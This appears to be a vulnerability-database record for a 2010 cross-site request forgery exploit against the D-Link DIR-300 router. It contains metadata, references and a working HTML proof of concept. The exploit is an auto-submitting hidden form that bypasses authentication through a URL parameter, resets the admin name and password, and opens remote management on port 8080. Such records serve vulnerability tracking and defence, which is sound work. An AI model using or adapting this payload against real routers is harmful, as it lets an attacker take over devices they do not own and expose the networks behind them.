ID
VAR-E-201012-0577
EDB ID
15753
TITLE
D-Link DIR-300 - Cross-Site Request Forgery (Change Admin Account Settings) - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
D-Link DIR-300 - Cross-Site Request Forgery (Change Admin Account Settings).. webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | d link | model: | dir-300 | scope: | - | version: | - | Trust: 1.6 |
EXPLOIT
<!--
[+] Title: D-Link DIR-300 CSRF Vuln. (Change Admin Account Settings) PoC Exploit
[+] Description: Enable Remote Menagement for specific IP
[+] Firmware Version: 1.04
[+] Note: No need administrator to be logged (:
[+] Author: outlaw.dll
[+] Date: 17.12.2010
[+] Tested on: Windows 7 Ultimate (Google Chrome) but will work in any other OS
This firmware version is full of CSRF and other type of vulnerabilities.
W_o.O_W
-->
<form name="exploit" action="http://server/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0" method="post">
<input type="hidden" name="ACTION_POST" value="1" />
<input type="hidden" name="admin_name" value="outlaw.dll" />
<input type="hidden" name="admin_password1" value="1337" />
<input type="hidden" name="admin_password2" value="1337" />
<input type="hidden" name="rt_enable_h" value="1" />
<input type="hidden" name="rt_port" value="8080" />
<input type="hidden" name="rt_ipaddr" value="192.168.0.1337" />
</form>
<script>document.exploit.submit();</script>
Trust: 1.0
EXPLOIT LANGUAGE
html
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Cross-Site Request Forgery (Change Admin Account Settings)
Trust: 1.0
CREDITS
outlaw.dll
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 15753 | Trust: 1.6 |
| db: | EDBNET | id: | 38587 | Trust: 0.6 |
REFERENCES
| url: | https://www.exploit-db.com/exploits/15753/ | Trust: 0.6 |
SOURCES
| db: | EXPLOIT-DB | id: | 15753 |
| db: | EDBNET | id: | 38587 |
LAST UPDATE DATE
2022-07-27T09:45:35.430000+00:00
SOURCES RELEASE DATE
| db: | EXPLOIT-DB | id: | 15753 | date: | 2010-12-17T00:00:00 |
| db: | EDBNET | id: | 38587 | date: | 2010-12-17T00:00:00 |